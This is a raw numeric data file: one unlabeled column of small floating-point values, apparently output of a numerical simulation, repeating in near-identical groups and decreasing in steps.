0.000188357
0.000192178
0.000191967
0.000188139
0.000191964
0.000188139
0.000188347
0.000183204
0.000179443
0.000183455
0.000179346
0.00017954
0.000183302
0.000183427
0.000188328
0.000192199
0.000192082
0.000188092
0.000191993
0.000188233
0.000188129
0.000183157
0.000183395
0.000179364
0.00017957
0.000179571
0.0001834
0.000183164
0.000188357
0.000191965
0.000192178
0.00018814
0.000191965
0.000188347
0.000188136
0.0001832
0.000179438
0.00018345
0.000179335
0.000183416
0.000183296
0.000179532
0.000188322
0.000192194
0.000192078
0.000188087
0.000191989
0.00018812
0.000188226
0.00018316
0.000183395
0.000179568
0.000179356
0.000183165
0.000183395
0.000179566
0.000200923
0.000200514
0.000197124
0.000197122
0.000200769
0.000200767
0.00019696
0.000188186
0.00018858
0.000191966
0.000191965
0.000188344
0.000192123
0.000188343
0.000200728
0.00020096
0.00019712
0.000196919
0.000200729
0.000200966
0.000197127
0.000205887
0.000209644
0.000209763
0.000205649
0.000205789
0.000209556
0.000205686
0.000205921
0.000205711
0.000209526
0.000209744
0.000205911
0.000209526
0.000205706
0.000200766
0.000196898
0.000201014
0.000197004
0.000200861
0.000200982
0.000197095
0.000188352
0.000191962
0.000192173
0.000188135
0.000191958
0.000188346
0.000188132
0.000183195
0.000179435
0.000183446
0.000179332
0.00017953
0.000183294
0.000183413
0.000188319
0.000192191
0.000192074
0.000188082
0.000191987
0.000188225
0.000188117
0.000183153
0.000183391
0.000179564
0.000179353
0.000179562
0.000183163
0.000183391
0.000188354
0.000191959
0.000192173
0.000188135
0.000191961
0.000188344
0.000188132
0.000183199
0.000179437
0.000183446
0.000179332
0.000183412
0.000183295
0.000179532
0.000188321
0.000192188
0.000192075
0.000188083
0.000191988
0.000188116
0.000188226
0.000183158
0.00018339
0.000179566
0.000179353
0.000183164
0.000183392
0.000179563
0.000188186
0.000188582
0.000191966
0.000191964
0.000192122
0.000188342
0.000188341
0.000165787
0.00016538
0.000161983
0.000161982
0.00016182
0.000165632
0.000165634
0.000153048
0.000153441
0.000156814
0.000156812
0.000156976
0.000153203
0.000153202
0.000165582
0.000165829
0.000161787
0.000161989
0.000165829
0.000165587
0.00016199
0.000170754
0.000174506
0.000174622
0.000170516
0.000170552
0.000174419
0.000170657
0.000170794
0.000170581
0.00017461
0.000174397
0.000170575
0.000174398
0.000170788
0.000165627
0.000161768
0.000165878
0.000161869
0.000165849
0.000165725
0.000161961
0.00016558
0.000165826
0.000161783
0.000161985
0.000165826
0.000165584
0.000161987
0.000170756
0.000174509
0.000174627
0.000170519
0.000174423
0.000170553
0.000170661
0.000170795
0.000170581
0.000174616
0.000174396
0.000174399
0.000170577
0.000170785
0.000165626
0.000161765
0.000165879
0.000161871
0.000165846
0.00016196
0.000165726
0.00015322
0.000157034
0.000156828
0.000153002
0.000156822
0.000152999
0.000153209
0.000148055
0.000144294
0.000148301
0.000144192
0.00014815
0.000148272
0.000144391
0.000153187
0.000157051
0.000156934
0.000152944
0.000153089
0.00015685
0.000152981
0.000148002
0.000148251
0.000144218
0.000144423
0.000148252
0.000148005
0.000144423
0.000153222
0.000157032
0.000156828
0.000153002
0.000156824
0.000152996
0.000153213
0.000148052
0.000144299
0.000148304
0.000144192
0.000148271
0.000148152
0.000144392
0.000153185
0.000157048
0.000156933
0.000152948
0.000156847
0.00015298
0.000153092
0.000148001
0.000148251
0.000144216
0.000144426
0.000148247
0.000148008
0.000144425
0.000165792
0.000165385
0.000161989
0.00016199
0.000165639
0.000165639
0.000161825
0.000153052
0.000153443
0.000156817
0.00015682
0.000153206
0.000156979
0.000153207
0.000165581
0.000165825
0.000161784
0.000161988
0.000165822
0.000165586
0.000161993
0.000170752
0.000174502
0.00017462
0.000170513
0.000170548
0.000174416
0.000170655
0.000170792
0.000170576
0.000174605
0.000174397
0.00017057
0.000174396
0.000170784
0.000165623
0.000161762
0.000165874
0.000161868
0.000165841
0.000165723
0.00016196
0.000165579
0.000165825
0.000161989
0.00016178
0.000165586
0.000165821
0.000161989
0.00017075
0.000174503
0.000174622
0.000170513
0.000174416
0.000170549
0.000170654
0.00017079
0.000170575
0.000174394
0.000174606
0.000174395
0.000170782
0.00017057
0.000165621
0.00016176
0.000165873
0.000161865
0.00016584
0.000161957
0.00016572
0.000153219
0.000157036
0.000156825
0.000152996
0.000156825
0.000152999
0.000153204
0.000148053
0.000144296
0.0001483
0.000144191
0.000148151
0.000148271
0.000144388
0.000153188
0.000157049
0.000156931
0.000152944
0.00015309
0.000156849
0.000152981
0.000147995
0.000148243
0.000144216
0.000144419
0.000148249
0.000148001
0.000144417
0.000153214
0.000156825
0.000157028
0.000152994
0.000156819
0.000153206
0.000152992
0.000148051
0.000144297
0.0001483
0.000144191
0.00014827
0.00014815
0.000144387
0.000153184
0.000157046
0.000156929
0.000152945
0.000156846
0.000152979
0.000153089
0.000147996
0.000148242
0.000144421
0.000144212
0.000148005
0.000148242
0.00014442
0.000165585
0.000165825
0.000161996
0.000161787
0.000165593
0.000165824
0.000161995
0.000170757
0.000174509
0.000174625
0.000170517
0.00017066
0.000174422
0.000170552
0.000170795
0.000170579
0.000174401
0.00017461
0.000170788
0.000174401
0.000170573
0.00016563
0.000161767
0.000165877
0.000161872
0.000165728
0.000165845
0.000161965
0.000153222
0.00015704
0.000156833
0.000153003
0.000156828
0.000153001
0.000153211
0.000148055
0.000144301
0.000148306
0.000144198
0.000144396
0.000148154
0.000148274
0.000153189
0.000157054
0.000156938
0.00015295
0.000156853
0.000153094
0.000152984
0.000148003
0.00014825
0.00014422
0.000144428
0.000144427
0.000148251
0.000148009
0.000153222
0.000156834
0.000157038
0.000153006
0.000156829
0.000153213
0.000153003
0.000148058
0.000144299
0.000148307
0.000144198
0.000148278
0.000148155
0.000144393
0.00015319
0.000157052
0.000156936
0.00015295
0.000156852
0.000152986
0.000153093
0.000148001
0.000148254
0.000144422
0.000144222
0.000148008
0.000148255
0.000144422
0.000165785
0.000165378
0.00016198
0.00016198
0.000165632
0.00016563
0.000161819
0.00015305
0.000153442
0.00015681
0.000156813
0.000153205
0.000156975
0.000153204
0.000165582
0.000165817
0.00016199
0.000161785
0.000165584
0.000165823
0.000161992
0.000170755
0.000174506
0.000174621
0.000170515
0.000170658
0.00017442
0.000170551
0.000170792
0.000170571
0.000174399
0.000174603
0.000170781
0.000174398
0.000170569
0.000165628
0.000161767
0.000165877
0.000161871
0.000165725
0.000165847
0.000161963
0.000153221
0.000156829
0.000157031
0.000152997
0.000156825
0.000153208
0.000152996
0.000148052
0.000144301
0.000148303
0.000144196
0.000144396
0.000148151
0.000148272
0.000153185
0.000157047
0.000156931
0.000152945
0.000156847
0.000153089
0.000152979
0.000148001
0.000148248
0.000144424
0.000144223
0.00014443
0.000148003
0.00014825
0.000153219
0.00015683
0.000157035
0.000153001
0.000156825
0.000153208
0.000153
0.000148052
0.0001443
0.000148306
0.000144196
0.000148273
0.000148153
0.000144392
0.000153186
0.000157053
0.000156935
0.00015295
0.00015685
0.000152985
0.000153094
0.000147999
0.000148251
0.000144421
0.000144221
0.000148002
0.000148253
0.000144423
0.000153054
0.000153446
0.00015682
0.00015682
0.000156981
0.000153209
0.00015321
0.000130648
0.000130247
0.000126844
0.000126841
0.000126675
0.000130501
0.000130502
0.000117903
0.000118288
0.000121652
0.000121652
0.000121817
0.000118055
0.000118056
0.000130414
0.000130671
0.000126642
0.000126844
0.000130668
0.000130421
0.000126849
0.000135611
0.000139354
0.000139473
0.000135373
0.000135406
0.000139272
0.000135515
0.000135651
0.000135431
0.00013946
0.000139264
0.000135427
0.000139256
0.000135647
0.000130472
0.000126616
0.000130725
0.000126725
0.000130696
0.000130573
0.000126814
0.000130417
0.000130677
0.000126644
0.000126844
0.000130668
0.000130421
0.00012685
0.000135614
0.000139357
0.000139474
0.000135375
0.000139273
0.000135407
0.000135518
0.000135659
0.000135438
0.000139459
0.000139268
0.000139261
0.000135429
0.00013565
0.000130475
0.000126619
0.000130726
0.000126726
0.000130696
0.000126819
0.000130572
0.000118079
0.000121879
0.000121687
0.000117846
0.00012168
0.000117852
0.000118058
0.000112891
0.000109146
0.000113144
0.00010904
0.00011299
0.000113119
0.00010924
0.000118038
0.000121895
0.000121774
0.000117802
0.000117945
0.000121693
0.000117831
0.000112814
0.00011308
0.000109073
0.00010927
0.000113086
0.000112814
0.000109273
0.000118079
0.000121889
0.000121686
0.000117847
0.000121681
0.000117856
0.00011806
0.000112894
0.000109148
0.000113145
0.000109039
0.00011312
0.000112992
0.000109241
0.000118044
0.0001219
0.000121776
0.000117804
0.000121699
0.000117834
0.00011795
0.000112814
0.00011308
0.000109068
0.000109271
0.000113084
0.000112817
0.000109273
0.000130648
0.000130241
0.000126836
0.000126836
0.000130491
0.00013049
0.000126676
0.000117905
0.000118295
0.00012165
0.000121652
0.00011806
0.000121818
0.000118058
0.000130414
0.000130669
0.00012664
0.000126845
0.000130667
0.000130419
0.000126848
0.000135611
0.000139355
0.000139473
0.000135373
0.000135406
0.000139269
0.000135517
0.000135653
0.000135428
0.000139459
0.00013926
0.000135427
0.000139255
0.000135644
0.000130471
0.000126617
0.000130725
0.000126724
0.000130696
0.000130572
0.000126815
0.000130417
0.000130668
0.000126844
0.000126644
0.000130419
0.000130672
0.000126849
0.000135612
0.000139355
0.000139473
0.000135374
0.000139269
0.000135406
0.000135517
0.000135656
0.000135428
0.00013926
0.000139457
0.000139255
0.000135643
0.000135429
0.000130474
0.000126618
0.000130725
0.000126726
0.000130696
0.000126818
0.000130573
0.000118081
0.000121877
0.00012169
0.000117849
0.000121679
0.000117851
0.000118066
0.000112893
0.000109148
0.000113143
0.000109038
0.000112992
0.000113119
0.000109241
0.000118041
0.000121895
0.000121774
0.000117801
0.000117947
0.000121694
0.00011783
0.000112817
0.000113088
0.00010907
0.000109271
0.000113086
0.000112821
0.000109274
0.000118084
0.00012169
0.000121882
0.000117849
0.000121682
0.000118067
0.000117853
0.000112894
0.00010915
0.000113144
0.00010904
0.000113118
0.000112993
0.000109243
0.000118042
0.000121897
0.000121775
0.000117803
0.000121697
0.000117831
0.000117949
0.00011282
0.000113088
0.000109274
0.000109073
0.000112823
0.000113084
0.000109279
0.000130417
0.000130672
0.000126847
0.000126644
0.000130419
0.000130671
0.000126852
0.000135614
0.000139358
0.000139479
0.000135377
0.000135517
0.000139275
0.000135409
0.000135656
0.000135433
0.000139262
0.000139465
0.000135643
0.000139258
0.000135432
0.000130474
0.000126619
0.000130727
0.000126726
0.000130574
0.000130697
0.000126818
0.000118083
0.000121881
0.000121692
0.000117847
0.000121683
0.000117853
0.000118066
0.000112895
0.000109152
0.000113146
0.000109044
0.000109248
0.000112993
0.000113121
0.000118041
0.000121897
0.000121776
0.000117804
0.000121697
0.000117947
0.000117831
0.000112822
0.000113087
0.000109084
0.000109276
0.000109285
0.000113093
0.000112822
0.000118086
0.000121693
0.000121884
0.000117851
0.000121686
0.000118068
0.00011786
0.000112897
0.00010915
0.000113145
0.00010904
0.00011312
0.000112996
0.000109243
0.000118045
0.000121899
0.000121778
0.000117803
0.000121699
0.000117834
0.000117951
0.000112822
0.000113091
0.000109273
0.000109075
0.000112823
0.000113093
0.000109277
0.000130648
0.000130245
0.000126845
0.000126844
0.000130494
0.000130496
0.000126679
0.000117908
0.000118295
0.000121657
0.000121659
0.000118064
0.000121823
0.000118064
0.000130421
0.000130678
0.000126847
0.000126649
0.000130422
0.00013068
0.000126852
0.000135618
0.000139358
0.000139478
0.000135378
0.000135521
0.000139275
0.000135413
0.000135659
0.000135436
0.000139264
0.000139463
0.000135646
0.00013926
0.000135435
0.000130479
0.000126624
0.000130729
0.00012673
0.000130577
0.000130704
0.000126821
0.000118082
0.00012169
0.000121885
0.000117849
0.000121683
0.000118064
0.000117856
0.000112894
0.000109153
0.000113147
0.000109044
0.000109246
0.000112995
0.000113123
0.000118042
0.000121901
0.000121778
0.000117804
0.000121698
0.000117951
0.000117834
0.000112818
0.000113091
0.000109274
0.000109077
0.000109278
0.000112824
0.000113094
0.000118081
0.000121691
0.000121885
0.000117852
0.000121682
0.000118066
0.000117856
0.000112895
0.00010915
0.000113145
0.000109041
0.000113122
0.000112994
0.000109243
0.000118043
0.000121902
0.000121778
0.000117804
0.000121698
0.000117835
0.00011795
0.000112819
0.000113092
0.000109273
0.000109074
0.000112824
0.00011309
0.000109276
0.000117907
0.000118292
0.000121658
0.000121659
0.000121823
0.000118063
0.000118061
9.54875e-05
9.51024e-05
9.16793e-05
9.16786e-05
9.151e-05
9.53457e-05
9.53458e-05
8.27473e-05
8.31261e-05
8.64571e-05
8.64572e-05
8.66334e-05
8.28999e-05
8.28992e-05
9.52142e-05
9.54982e-05
9.1496e-05
9.16947e-05
9.54989e-05
9.52161e-05
9.1703e-05
0.000100462
0.000104186
0.00010432
0.000100229
0.000100249
0.000104112
0.00010037
0.000100516
0.000100272
0.000104306
0.000104119
0.000100283
0.000104105
0.000100496
9.53037e-05
9.14504e-05
9.55556e-05
9.15711e-05
9.55387e-05
9.54035e-05
9.16604e-05
9.52103e-05
9.54992e-05
9.14964e-05
9.16921e-05
9.54942e-05
9.52164e-05
9.17014e-05
0.000100461
0.000104185
0.000104319
0.000100227
0.000104111
0.000100248
0.000100369
0.000100514
0.000100273
0.000104299
0.000104121
0.000104106
0.000100277
0.000100498
9.53029e-05
9.14532e-05
9.55516e-05
9.15719e-05
9.55389e-05
9.16628e-05
9.54014e-05
8.29419e-05
8.67155e-05
8.65397e-05
8.268e-05
8.65199e-05
8.26949e-05
8.29116e-05
7.77112e-05
7.39916e-05
7.79575e-05
7.38499e-05
7.78078e-05
7.79636e-05
7.40767e-05
8.28833e-05
8.67361e-05
8.65891e-05
8.26518e-05
8.27977e-05
8.65221e-05
8.26554e-05
7.75815e-05
7.78962e-05
7.39104e-05
7.41165e-05
7.78953e-05
7.75884e-05
7.41255e-05
8.2938e-05
8.67167e-05
8.65361e-05
8.26765e-05
8.65157e-05
8.26962e-05
8.29107e-05
7.771e-05
7.39887e-05
7.79551e-05
7.38479e-05
7.79592e-05
7.78052e-05
7.40766e-05
8.28835e-05
8.67391e-05
8.65874e-05
8.26506e-05
8.65229e-05
8.26554e-05
8.27957e-05
7.75794e-05
7.78935e-05
7.39135e-05
7.41143e-05
7.78954e-05
7.75872e-05
7.4125e-05
9.54848e-05
9.51e-05
9.1675e-05
9.16756e-05
9.53419e-05
9.53402e-05
9.15067e-05
8.2742e-05
8.31239e-05
8.64508e-05
8.64538e-05
8.28938e-05
8.66283e-05
8.28951e-05
9.52135e-05
9.54947e-05
9.14938e-05
9.16913e-05
9.5497e-05
9.52156e-05
9.17016e-05
0.000100463
0.000104185
0.000104318
0.000100227
0.000100247
0.000104111
0.00010037
0.000100518
0.000100272
0.0001043
0.000104118
0.00010028
0.000104106
0.000100494
9.53022e-05
9.14513e-05
9.55535e-05
9.15723e-05
9.55382e-05
9.54024e-05
9.16615e-05
9.52128e-05
9.55e-05
9.16917e-05
9.14945e-05
9.52166e-05
9.54991e-05
9.1701e-05
0.000100464
0.000104187
0.000104321
0.000100229
0.000104114
0.000100249
0.000100372
0.000100516
0.000100274
0.000104119
0.000104307
0.000104108
0.000100497
0.000100284
9.53058e-05
9.14528e-05
9.55544e-05
9.15733e-05
9.55397e-05
9.16632e-05
9.54041e-05
8.29428e-05
8.67146e-05
8.65398e-05
8.26839e-05
8.65182e-05
8.26968e-05
8.29165e-05
7.77086e-05
7.39921e-05
7.79572e-05
7.38509e-05
7.78072e-05
7.79621e-05
7.40797e-05
8.28847e-05
8.67384e-05
8.6589e-05
8.26524e-05
8.27973e-05
8.65227e-05
8.26565e-05
7.75867e-05
7.79054e-05
7.39165e-05
7.41206e-05
7.78995e-05
7.75952e-05
7.413e-05
8.29426e-05
8.65393e-05
8.67147e-05
8.26828e-05
8.65187e-05
8.29149e-05
8.2698e-05
7.7712e-05
7.39926e-05
7.79594e-05
7.38567e-05
7.79681e-05
7.78101e-05
7.40797e-05
8.28857e-05
8.67396e-05
8.65897e-05
8.2654e-05
8.65241e-05
8.2659e-05
8.27986e-05
7.75832e-05
7.79048e-05
7.41161e-05
7.3917e-05
7.75915e-05
7.79007e-05
7.41244e-05
9.52045e-05
9.54978e-05
9.16869e-05
9.14884e-05
9.52086e-05
9.54959e-05
9.16924e-05
0.000100461
0.000104187
0.00010432
0.000100227
0.000100369
0.000104112
0.000100249
0.000100512
0.000100274
0.000104117
0.000104305
0.000100492
0.000104105
0.000100281
9.53042e-05
9.14508e-05
9.5553e-05
9.1568e-05
9.54018e-05
9.55405e-05
9.16575e-05
8.29401e-05
8.67049e-05
8.65397e-05
8.26787e-05
8.65166e-05
8.26908e-05
8.2914e-05
7.77064e-05
7.39926e-05
7.79557e-05
7.3852e-05
7.40801e-05
7.78059e-05
7.79602e-05
8.28815e-05
8.67326e-05
8.65868e-05
8.26492e-05
8.65192e-05
8.27948e-05
8.26528e-05
7.75828e-05
7.79011e-05
7.39165e-05
7.4122e-05
7.41313e-05
7.78953e-05
7.75926e-05
8.29358e-05
8.65387e-05
8.67049e-05
8.26735e-05
8.65124e-05
8.29142e-05
8.26876e-05
7.77042e-05
7.39867e-05
7.79529e-05
7.38468e-05
7.79564e-05
7.78024e-05
7.40741e-05
8.28779e-05
8.67333e-05
8.65844e-05
8.26478e-05
8.65171e-05
8.26509e-05
8.27908e-05
7.75805e-05
7.78979e-05
7.41206e-05
7.39094e-05
7.75928e-05
7.78889e-05
7.4125e-05
9.54911e-05
9.51029e-05
9.16809e-05
9.16802e-05
9.53499e-05
9.53487e-05
9.15133e-05
8.27461e-05
8.31209e-05
8.64546e-05
8.64561e-05
8.2896e-05
8.66334e-05
8.28961e-05
9.52056e-05
9.54904e-05
9.1692e-05
9.14893e-05
9.52131e-05
9.54927e-05
9.16959e-05
0.00010046
0.000104186
0.000104319
0.000100226
0.000100369
0.000104111
0.000100247
0.00010051
0.000100268
0.000104119
0.0001043
0.000100493
0.000104105
0.000100277
9.52999e-05
9.14493e-05
9.55517e-05
9.15694e-05
9.53999e-05
9.5537e-05
9.16589e-05
8.29439e-05
8.65453e-05
8.67125e-05
8.2678e-05
8.65232e-05
8.29172e-05
8.26949e-05
7.77091e-05
7.39934e-05
7.79569e-05
7.3851e-05
7.40816e-05
7.78075e-05
7.79615e-05
8.28847e-05
8.67363e-05
8.65889e-05
8.26515e-05
8.65244e-05
8.27972e-05
8.26542e-05
7.75859e-05
7.78971e-05
7.41253e-05
7.39199e-05
7.41351e-05
7.75944e-05
7.78989e-05
8.29402e-05
8.65442e-05
8.67076e-05
8.26785e-05
8.65183e-05
8.29171e-05
8.26912e-05
7.7706e-05
7.39884e-05
7.79538e-05
7.38468e-05
7.79575e-05
7.78036e-05
7.40759e-05
8.28813e-05
8.67338e-05
8.65855e-05
8.26485e-05
8.652e-05
8.26517e-05
8.27937e-05
7.75834e-05
7.78999e-05
7.41216e-05
7.39123e-05
7.75948e-05
7.78938e-05
7.41279e-05
8.27415e-05
8.31175e-05
8.64513e-05
8.64526e-05
8.66296e-05
8.28905e-05
8.28907e-05
6.03084e-05
5.99633e-05
5.65142e-05
5.65119e-05
5.63355e-05
6.01856e-05
6.01877e-05
4.75817e-05
4.79753e-05
5.12041e-05
5.12039e-05
5.13956e-05
4.77559e-05
4.77538e-05
5.99473e-05
6.02925e-05
5.63306e-05
5.65505e-05
6.02821e-05
5.996e-05
5.65699e-05
6.52981e-05
6.89759e-05
6.91593e-05
6.50792e-05
6.50397e-05
6.89169e-05
6.52194e-05
6.53828e-05
6.50917e-05
6.91154e-05
6.8962e-05
6.51034e-05
6.89271e-05
6.53479e-05
6.01032e-05
5.62199e-05
6.03379e-05
5.64191e-05
6.03922e-05
6.01998e-05
5.65018e-05
5.99467e-05
6.02938e-05
5.63309e-05
5.65489e-05
6.0281e-05
5.99587e-05
5.65673e-05
6.52971e-05
6.89739e-05
6.9159e-05
6.50765e-05
6.89165e-05
6.50394e-05
6.52197e-05
6.53823e-05
6.50922e-05
6.9117e-05
6.89588e-05
6.8926e-05
6.51036e-05
6.53457e-05
6.01026e-05
5.62195e-05
6.03334e-05
5.64189e-05
6.03916e-05
5.65009e-05
6.0198e-05
4.78563e-05
5.1513e-05
5.14034e-05
4.75106e-05
5.13404e-05
4.75323e-05
4.7803e-05
4.24901e-05
3.88818e-05
4.26759e-05
3.8547e-05
4.25576e-05
4.28323e-05
3.89623e-05
4.77386e-05
5.16036e-05
5.13568e-05
4.75317e-05
4.76583e-05
5.13139e-05
4.73964e-05
4.23223e-05
4.26909e-05
3.87603e-05
3.90555e-05
4.26639e-05
4.23624e-05
3.90723e-05
4.78545e-05
5.15173e-05
5.14014e-05
4.75134e-05
5.13371e-05
4.75364e-05
4.78031e-05
4.24911e-05
3.88802e-05
4.26768e-05
3.8547e-05
4.28345e-05
4.25575e-05
3.89629e-05
4.77404e-05
5.1606e-05
5.13574e-05
4.75334e-05
5.1315e-05
4.74014e-05
4.76584e-05
4.23221e-05
4.26944e-05
3.87588e-05
3.90559e-05
4.26655e-05
4.23633e-05
3.90726e-05
6.03092e-05
5.99666e-05
5.65165e-05
5.65177e-05
6.01926e-05
6.01902e-05
5.63356e-05
4.75829e-05
4.79762e-05
5.12044e-05
5.12067e-05
4.77554e-05
5.13961e-05
4.77574e-05
5.9943e-05
6.03016e-05
5.63359e-05
5.6551e-05
6.02853e-05
5.99609e-05
5.6571e-05
6.53032e-05
6.89777e-05
6.91627e-05
6.50834e-05
6.50458e-05
6.89214e-05
6.52225e-05
6.53859e-05
6.50978e-05
6.91237e-05
6.89632e-05
6.51107e-05
6.89303e-05
6.53496e-05
6.01096e-05
5.6228e-05
6.03424e-05
5.64234e-05
6.04018e-05
6.02016e-05
5.65044e-05
5.99482e-05
6.03056e-05
5.65501e-05
5.63368e-05
5.99603e-05
6.02923e-05
5.65697e-05
6.53001e-05
6.89784e-05
6.91655e-05
6.50845e-05
6.89201e-05
6.50474e-05
6.52219e-05
6.53819e-05
6.51003e-05
6.89598e-05
6.91234e-05
6.89262e-05
6.5348e-05
6.51124e-05
6.0107e-05
5.62284e-05
6.03415e-05
5.64229e-05
6.04024e-05
5.65046e-05
6.02021e-05
4.78591e-05
5.15152e-05
5.14028e-05
4.75103e-05
5.13404e-05
4.75351e-05
4.78017e-05
4.24908e-05
3.88826e-05
4.26758e-05
3.85447e-05
4.25593e-05
4.28359e-05
3.89614e-05
4.77373e-05
5.16071e-05
5.13567e-05
4.75331e-05
4.76611e-05
5.1314e-05
4.73986e-05
4.23202e-05
4.2691e-05
3.87602e-05
3.90558e-05
4.26647e-05
4.23609e-05
3.90739e-05
4.78511e-05
5.14016e-05
5.15155e-05
4.75085e-05
5.13378e-05
4.78002e-05
4.75294e-05
4.24855e-05
3.88755e-05
4.26715e-05
3.85411e-05
4.28303e-05
4.25525e-05
3.89588e-05
4.77364e-05
5.16069e-05
5.13556e-05
4.75308e-05
5.13136e-05
4.73979e-05
4.76576e-05
4.23169e-05
4.26858e-05
3.90552e-05
3.87553e-05
4.23602e-05
4.26558e-05
3.90721e-05
5.99423e-05
6.02882e-05
5.65441e-05
5.63281e-05
5.9953e-05
6.02777e-05
5.65655e-05
6.5294e-05
6.89726e-05
6.91593e-05
6.50781e-05
6.52161e-05
6.89163e-05
6.5039e-05
6.53793e-05
6.50968e-05
6.89636e-05
6.912e-05
6.53453e-05
6.8926e-05
6.51061e-05
6.00977e-05
5.62174e-05
6.03358e-05
5.64162e-05
6.01923e-05
6.03896e-05
5.64983e-05
4.78524e-05
5.15101e-05
5.13979e-05
4.75068e-05
5.13362e-05
4.75282e-05
4.77968e-05
4.24861e-05
3.88815e-05
4.2673e-05
3.85395e-05
3.89609e-05
4.25543e-05
4.28308e-05
4.77348e-05
5.16024e-05
5.13543e-05
4.75304e-05
5.1311e-05
4.76561e-05
4.73965e-05
4.23161e-05
4.26863e-05
3.87551e-05
3.90511e-05
3.90735e-05
4.26571e-05
4.23564e-05
4.78525e-05
5.13987e-05
5.15122e-05
4.75088e-05
5.13375e-05
4.77985e-05
4.75301e-05
4.24829e-05
3.88783e-05
4.26695e-05
3.85388e-05
4.28276e-05
4.25509e-05
3.89559e-05
4.77349e-05
5.16001e-05
5.13528e-05
4.75278e-05
5.13112e-05
4.73953e-05
4.76536e-05
4.23169e-05
4.26875e-05
3.90503e-05
3.87528e-05
4.23581e-05
4.26552e-05
3.90687e-05
6.03071e-05
5.99621e-05
5.65111e-05
5.65094e-05
6.01839e-05
6.01855e-05
5.63339e-05
4.75808e-05
4.79726e-05
5.12014e-05
5.12013e-05
4.77516e-05
5.1393e-05
4.77516e-05
5.99383e-05
6.02959e-05
5.65448e-05
5.63324e-05
5.99533e-05
6.02814e-05
5.65643e-05
6.52957e-05
6.89742e-05
6.91588e-05
6.50784e-05
6.5215e-05
6.89165e-05
6.50383e-05
6.53831e-05
6.50937e-05
6.89624e-05
6.91179e-05
6.53445e-05
6.89272e-05
6.51048e-05
6.01066e-05
5.62213e-05
6.03364e-05
5.64162e-05
6.01944e-05
6.03924e-05
5.64987e-05
4.78535e-05
5.13984e-05
5.15111e-05
4.75063e-05
5.13386e-05
4.77964e-05
4.75282e-05
4.24871e-05
3.88817e-05
4.26732e-05
3.85434e-05
3.8962e-05
4.25538e-05
4.28322e-05
4.77342e-05
5.16023e-05
5.13539e-05
4.75299e-05
5.13121e-05
4.76563e-05
4.73921e-05
4.2317e-05
4.26872e-05
3.90546e-05
3.87603e-05
3.90746e-05
4.23573e-05
4.26598e-05
4.78521e-05
5.1399e-05
5.15185e-05
4.75097e-05
5.13352e-05
4.77973e-05
4.75348e-05
4.24854e-05
3.8872e-05
4.26728e-05
3.85428e-05
4.28287e-05
4.25498e-05
3.89571e-05
4.77342e-05
5.16082e-05
5.13541e-05
4.75296e-05
5.13122e-05
4.73971e-05
4.76557e-05
4.23145e-05
4.26859e-05
3.90496e-05
3.87559e-05
4.23555e-05
4.26599e-05
3.90666e-05
4.75766e-05
4.79676e-05
5.11975e-05
5.11985e-05
5.13904e-05
4.77468e-05
4.77461e-05
2.4869e-05
2.50621e-05
2.14483e-05
2.1446e-05
2.08379e-05
2.50648e-05
2.50604e-05
1.21952e-05
1.4145e-05
1.60992e-05
1.60974e-05
1.56236e-05
1.32704e-05
1.32701e-05
2.49098e-05
2.50509e-05
2.1109e-05
2.18738e-05
2.49122e-05
2.50469e-05
2.18374e-05
3.02114e-05
3.365e-05
3.39828e-05
2.98546e-05
2.96012e-05
3.36836e-05
3.01263e-05
3.04379e-05
2.99244e-05
3.3865e-05
3.39917e-05
2.99122e-05
3.3847e-05
3.03911e-05
2.48685e-05
2.04908e-05
2.46124e-05
2.13498e-05
2.50135e-05
2.47638e-05
2.15407e-05
2.49076e-05
2.505e-05
2.11059e-05
2.18733e-05
2.49077e-05
2.50463e-05
2.18351e-05
3.02089e-05
3.36466e-05
3.39835e-05
2.98558e-05
3.36826e-05
2.96027e-05
3.01257e-05
3.04382e-05
2.99241e-05
3.38615e-05
3.39919e-05
3.38477e-05
2.99116e-05
3.03907e-05
2.48651e-05
2.04827e-05
2.46055e-05
2.13454e-05
2.50085e-05
2.15355e-05
2.47602e-05
1.38065e-05
1.60553e-05
1.73568e-05
1.26937e-05
1.70258e-05
1.24692e-05
1.39745e-05
8.87603e-06
7.21143e-06
5.31109e-06
5.33733e-06
7.87533e-06
6.78583e-06
7.36622e-06
1.33206e-05
1.57838e-05
1.57225e-05
1.12255e-05
1.29574e-05
1.6335e-05
1.15008e-05
9.49129e-06
8.7971e-06
6.05369e-06
7.99493e-06
7.63942e-06
9.92971e-06
7.58281e-06
1.3805e-05
1.60529e-05
1.73571e-05
1.26925e-05
1.70258e-05
1.24711e-05
1.39745e-05
8.87622e-06
7.2151e-06
5.31157e-06
5.3332e-06
6.78683e-06
7.87716e-06
7.36613e-06
1.33197e-05
1.57811e-05
1.57188e-05
1.12273e-05
1.63326e-05
1.1504e-05
1.29571e-05
9.49036e-06
8.79509e-06
6.05261e-06
7.99508e-06
7.63673e-06
9.93039e-06
7.58301e-06
2.48638e-05
2.50567e-05
2.14404e-05
2.14402e-05
2.50539e-05
2.50617e-05
2.08328e-05
1.21984e-05
1.41439e-05
1.60963e-05
1.60966e-05
1.32705e-05
1.56218e-05
1.32739e-05
2.49084e-05
2.50439e-05
2.11031e-05
2.1866e-05
2.49067e-05
2.50432e-05
2.18318e-05
3.02095e-05
3.36427e-05
3.3978e-05
2.98531e-05
2.95965e-05
3.36812e-05
3.01246e-05
3.0434e-05
2.99195e-05
3.38603e-05
3.39893e-05
2.99077e-05
3.38455e-05
3.03869e-05
2.48648e-05
2.04786e-05
2.46078e-05
2.13459e-05
2.50046e-05
2.47613e-05
2.15345e-05
2.49034e-05
2.5043e-05
2.18656e-05
2.10979e-05
2.50408e-05
2.49029e-05
2.18289e-05
3.02058e-05
3.36388e-05
3.39756e-05
2.98503e-05
3.3679e-05
2.95938e-05
3.01213e-05
3.04358e-05
2.99209e-05
3.39909e-05
3.38576e-05
3.38494e-05
3.03881e-05
2.99086e-05
2.48615e-05
2.04835e-05
2.46005e-05
2.13412e-05
2.50036e-05
2.15324e-05
2.47561e-05
1.3796e-05
1.60454e-05
1.73459e-05
1.26787e-05
1.70162e-05
1.24587e-05
1.3964e-05
8.86696e-06
7.20612e-06
5.29551e-06
5.32286e-06
7.86934e-06
6.7692e-06
7.35697e-06
1.33128e-05
1.57747e-05
1.57166e-05
1.12156e-05
1.29513e-05
1.63276e-05
1.1489e-05
9.47953e-06
8.77782e-06
6.0402e-06
7.98461e-06
7.62114e-06
9.91921e-06
7.57273e-06
1.3796e-05
1.73464e-05
1.6044e-05
1.26801e-05
1.70161e-05
1.39645e-05
1.24591e-05
8.86665e-06
7.20506e-06
